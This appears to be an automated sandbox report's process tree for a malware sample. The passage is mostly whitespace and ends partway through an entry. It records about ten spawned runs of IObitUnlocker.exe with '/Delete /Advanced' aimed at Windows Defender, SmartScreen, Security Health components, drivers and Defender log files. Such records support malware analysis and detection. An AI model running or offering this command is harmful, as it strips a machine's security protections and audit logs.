                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:12028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 